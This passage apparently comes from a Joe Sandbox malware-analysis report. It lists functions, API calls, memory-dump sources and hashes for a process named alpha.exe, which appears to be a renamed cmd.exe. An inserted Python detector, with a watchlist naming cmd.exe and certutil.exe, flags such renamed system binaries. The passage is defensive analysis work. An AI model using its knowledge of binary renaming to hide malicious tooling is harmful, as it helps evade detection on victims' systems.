                                       • APIs on the graph: Sleep (in a retry loop), _amsg_exit, _initterm, exit, _cexit; this Sleep/_initterm/_cexit/exit sequence is the MSVC CRT entry-point pattern, so the Sleep here is CRT initialisation rather than an evasion delay
                                       • Internal calls: 7ff755cb37d8, 7ff755cb94f0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                      • String ID:
                                      • API String ID: 4291973834-0
                                      • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                      • Instruction ID: 2335df1199ad318f74c5eae0fc773c3075df21977897c4360f65a0b77039ad75
                                      • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                      • Instruction Fuzzy Hash: 3D41B9EFE0868386E691FB10E940279A2A0AF44F6CFC80436D94D876A1DF7DEC448660

                                       Control-flow Graph
                                       (rendered graph not reproduced; the executed/not-executed colouring is lost in extraction)
                                       • Function: 7ff755ca89c0 (basic blocks 7ff755ca89c0-7ff755ca8b16, cold path at 7ff755cbb3fc-7ff755cbb435)
                                       • APIs on the graph: memset, GetDriveTypeW, GetVolumeInformationW, GetLastError, ??_V@YAXPEAX@Z
                                       • Internal calls: 7ff755caca40, 7ff755cb8f80
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$DriveErrorInformationLastTypeVolume
                                      • String ID:
                                      • API String ID: 850181435-0
                                      • Opcode ID: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                      • Instruction ID: a13d0db209a67bc175d0de78ec16218d0bb120d775274daa8a4d0b866a99427d
                                      • Opcode Fuzzy Hash: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                      • Instruction Fuzzy Hash: BF414FB7608BC2CAE760DF20D8442E9BBA4FB89F49F994525DA4D8BB48CF38D545C710

                                       Control-flow Graph
                                       (rendered graph not reproduced; the executed/not-executed colouring is lost in extraction)
                                       • Function: 7ff755cb4a14 (basic blocks 7ff755cb4a14-7ff755cb4ac5, no cold path)
                                       • APIs on the graph: GetEnvironmentStringsW, GetProcessHeap, HeapAlloc, memmove, FreeEnvironmentStringsW (a copy of the process environment block into a heap buffer; no internal calls)
                                      APIs
                                      • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A28
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A66
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A7D
                                      • memmove.MSVCRT(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A9A
                                      • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4AA2
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                      • String ID:
                                      • API String ID: 1623332820-0
                                      • Opcode ID: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                      • Instruction ID: ee96a19b9fa0f1cc9fffb79ea2662411ed397d94518712410385f165bd0d9323
                                      • Opcode Fuzzy Hash: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                      • Instruction Fuzzy Hash: B81194ABA18B8382DE50AB41A404039FBA1EB89F94BCD9035DE4E03744DE3DE8418760
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                      • String ID:
                                      • API String ID: 1826527819-0
                                      • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                      • Instruction ID: 571ab0044a63b28afc6e93d8ac93c660179a7cfbd2b90d0ef0b0643428252375
                                      • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                      • Instruction Fuzzy Hash: 7F015BBA9086838AE6407B24A4451B9FF60EB8EF69FC86130D54F46395CF3C94448B20
                                      APIs
                                        • Part of subcall function 00007FF755CB1EA0: wcschr.MSVCRT(?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF755CD0D54), ref: 00007FF755CB1EB3
                                      • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF755CA92AC), ref: 00007FF755CB30CA
                                      • SetErrorMode.KERNELBASE ref: 00007FF755CB30DD
                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CB30F6
                                      • SetErrorMode.KERNELBASE ref: 00007FF755CB3106
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ErrorMode$FullNamePathwcschr
                                      • String ID:
                                      • API String ID: 1464828906-0
                                      • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                      • Instruction ID: aadf6ab21e20f87c1b43e20b080568f2d70318039600faa5db4c2cf0229446d1
                                      • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                      • Instruction Fuzzy Hash: C531D3ABE0865382E764AF15A44007EF661EB46FA8FDC9234DA5A433D0EE7DEC458310
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                      • API String ID: 2221118986-3416068913
                                      • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                      • Instruction ID: 9480f50401eb63d477c8859848da6b64336bdd9db7cef6448b0f6c72183955dc
                                      • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                      • Instruction Fuzzy Hash: 3411CAABA1864781EB90EB55E144279A6909F84FA8F9C4731ED6D4B7D5DD2CD8804320
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memsetwcschr
                                      • String ID: 2$COMSPEC
                                      • API String ID: 1764819092-1738800741
                                      • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                      • Instruction ID: 662b3d5409abe09da91de2967998a9e08c64981624db127003399d2cf7f84a53
                                      • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                      • Instruction Fuzzy Hash: 51519EBFA0864785FB70BB21D841379EB919F45F8CF8C4835DA0D466D6DE6CE8408760
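The two records above list the strings `onecore\base\cmd\maxpathawarestring.cpp` and `COMSPEC` among the functions recovered from the process 5 image, which is what ties that image back to cmd.exe even though the Signatures section flags the sample for dropping cmd.exe under a different name. The following is an added example, not Joe Sandbox output and not code from the sample: a stdlib-only Python check that recovers a PE's VS_VERSIONINFO `OriginalFilename` with a byte-level heuristic, searches for those two cmd.exe strings, and flags a file whose on-disk name does not match what the binary says it is. The marker list, the watchlist of binaries, the `Cmd.Exe` value and the sample bytes built by `build_sample` are assumptions constructed for illustration.

```python
"""Flag PE files that look like renamed copies of cmd.exe or certutil.exe.

Added example (not Joe Sandbox output). Two independent signals:
  1. the VS_VERSIONINFO 'OriginalFilename' value, recovered with a
     byte-level heuristic so the script needs no third-party modules;
  2. cmd.exe-specific strings taken from the function listings above.
"""
import struct
from typing import Dict, List, Optional

# Strings the sandbox lists for cmd.exe functions (assumed stable enough
# to serve as a fingerprint; not a complete signature).
CMD_MARKERS: List[bytes] = [
    b"onecore\\base\\cmd\\maxpathawarestring.cpp",
    b"COMSPEC",
]

# Binaries the report flags as dropped under a different name (assumed set).
RENAME_WATCHLIST = {"cmd.exe", "certutil.exe"}

# UTF-16LE key of the VS_VERSIONINFO String entry, with its terminator.
_ORIGINAL_FILENAME_KEY = "OriginalFilename".encode("utf-16-le") + b"\x00\x00"


def find_markers(data: bytes) -> List[str]:
    """Return the marker strings present in data, in ASCII or UTF-16LE form."""
    hits = []
    for marker in CMD_MARKERS:
        wide = marker.decode("ascii").encode("utf-16-le")
        if marker in data or wide in data:
            hits.append(marker.decode("ascii"))
    return hits


def original_filename(data: bytes) -> Optional[str]:
    """Heuristic read of OriginalFilename from a PE's version resource.

    A VS_VERSIONINFO String entry is: wLength, wValueLength, wType,
    szKey (UTF-16LE, null-terminated), DWORD padding, then the value
    (UTF-16LE, null-terminated). We locate the key, skip the zero
    padding and read up to the first UTF-16 null. This assumes the value
    starts with a character whose low byte is non-zero (true for any
    ASCII file name) and does not walk the resource directory tree.
    """
    idx = data.find(_ORIGINAL_FILENAME_KEY)
    if idx < 0:
        return None
    pos = idx + len(_ORIGINAL_FILENAME_KEY)
    while pos < len(data) and data[pos] == 0:      # alignment padding
        pos += 1
    end = pos
    while end + 1 < len(data) and data[end:end + 2] != b"\x00\x00":
        end += 2
    try:
        return data[pos:end].decode("utf-16-le") or None
    except UnicodeDecodeError:
        return None


def classify(data: bytes, path: str) -> Dict[str, object]:
    """Compare the file's on-disk name with what the binary claims to be."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    orig = original_filename(data)
    markers = find_markers(data)
    reasons = []
    if orig and orig.lower() in RENAME_WATCHLIST and orig.lower() != name:
        reasons.append(f"OriginalFilename is {orig} but file is named {name}")
    if markers and name != "cmd.exe":
        reasons.append("cmd.exe source/env strings in a file not named cmd.exe")
    return {
        "path": path,
        "original_filename": orig,
        "markers": markers,
        "suspicious": bool(reasons),
        "reasons": reasons,
    }


def scan_file(path: str) -> Dict[str, object]:
    """Read a file from disk and classify it."""
    with open(path, "rb") as fh:
        return classify(fh.read(), path)


def build_sample(original: str, markers: List[bytes]) -> bytes:
    """Constructed test bytes: fake header, one String entry, then markers.

    Not a valid PE; just enough layout to exercise the heuristics offline.
    """
    blob = b"MZ" + b"\x90" * 62                                  # fake DOS header
    value = original.encode("utf-16-le") + b"\x00\x00"
    entry = struct.pack("<HHH", 0, len(value) // 2, 1) + _ORIGINAL_FILENAME_KEY
    entry += b"\x00" * (-(len(blob) + len(entry)) % 4)          # DWORD padding
    entry += value
    return blob + entry + b"\x00" * 16 + b"\n".join(markers)


if __name__ == "__main__":
    renamed = build_sample("Cmd.Exe", CMD_MARKERS)
    print(classify(renamed, r"C:\Users\Public\alpha.exe"))      # suspicious
    print(classify(renamed, r"C:\Windows\System32\cmd.exe"))    # clean
```

The two signals are deliberately independent: a dropper that strips the version resource still leaves the embedded source path and `COMSPEC` string behind, and a build that happens to lack those strings is still caught by the `OriginalFilename` mismatch. For a production check, replace the byte-level heuristic with a proper resource walk (for example via `pefile`) and verify the Authenticode signature as well, since a renamed copy of a signed Microsoft binary still validates as Microsoft-signed.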
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                      • String ID:
                                      • API String ID: 4254246844-0
                                      • Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                      • Instruction ID: 079cbb35de01beabb00a3983ac20bd906b55bab50d1797c23c58b4b7e1a6c5e7
                                      • Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                      • Instruction Fuzzy Hash: 9E41B4ABA0874386EE20AB50E444379F7A0EF85FA8FDC4535DA4E47791DE3CE8458621
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$EnvironmentFreeProcessVariable
                                      • String ID:
                                      • API String ID: 2643372051-0
                                      • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                      • Instruction ID: 06eddbe180d11163b964c505e91ec28edcd14a2119231e091c34419f617a7a3f
                                      • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                      • Instruction Fuzzy Hash: B1F062A7A19B8385EA40AB65A544075EAA1FF5AFA4BCE9274C52E43390DE3C94848250
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _get_osfhandle$ConsoleMode
                                      • String ID:
                                      • API String ID: 1591002910-0
                                      • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                      • Instruction ID: 67575a527bb5efb5466e517999647032b9c05da1353cf30e2682f441c974d32b
                                      • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                      • Instruction Fuzzy Hash: A9F07ABAA09783CBE645AB11E845078FBA1FB89F19F984138C90E47320DF3CA4159B50
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: DriveType
                                      • String ID: :
                                      • API String ID: 338552980-336475711
                                      • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                      • Instruction ID: 2d0016b0763a197c1f25ec152b19339566973f95dd34a8cf6da0d82f619cd5d3
                                      • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                      • Instruction Fuzzy Hash: 1EE06DAB618641C6E720AB60E45106AF7A0FB8DB58FC81525EA8D83724DB3CD249CB18
                                      APIs
                                        • Part of subcall function 00007FF755CACD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDA6
                                        • Part of subcall function 00007FF755CACD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDBD
                                      • GetConsoleTitleW.KERNELBASE ref: 00007FF755CB5B52
                                        • Part of subcall function 00007FF755CB4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF755CB4297
                                        • Part of subcall function 00007FF755CB4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF755CB42D7
                                        • Part of subcall function 00007FF755CB4224: memset.MSVCRT ref: 00007FF755CB42FD
                                        • Part of subcall function 00007FF755CB4224: memset.MSVCRT ref: 00007FF755CB4368
                                        • Part of subcall function 00007FF755CB4224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF755CB4380
                                        • Part of subcall function 00007FF755CB4224: wcsrchr.MSVCRT ref: 00007FF755CB43E6
                                        • Part of subcall function 00007FF755CB4224: lstrcmpW.KERNELBASE ref: 00007FF755CB4401
                                      • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF755CB5BC7
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                      • String ID:
                                      • API String ID: 497088868-0
                                      • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                      • Instruction ID: 95d59afd5feec4c2b001340e9742b648a7e3289d150dc7d3ccd9095fd8b9787b
                                      • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                      • Instruction Fuzzy Hash: EF31B5BAB0C64342FA24B711A45117DE291FF89F98FCC5435E94E87B85EE3CE8018720
                                      APIs
                                      • FindClose.KERNELBASE(?,?,?,00007FF755CCEAC5,?,?,?,00007FF755CCE925,?,?,?,?,00007FF755CAB9B1), ref: 00007FF755CB3A56
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CloseFind
                                      • String ID:
                                      • API String ID: 1863332320-0
                                      • Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                      • Instruction ID: 5cf9f35596c6074769096066a22fe8052a00aaaa12214e51ed03916ac5d2ec50
                                      • Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                      • Instruction Fuzzy Hash: 8901F9EAE08683C5E754A755A440039F6A0FF45F98BECC030D50D83244DE2CFC828360
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
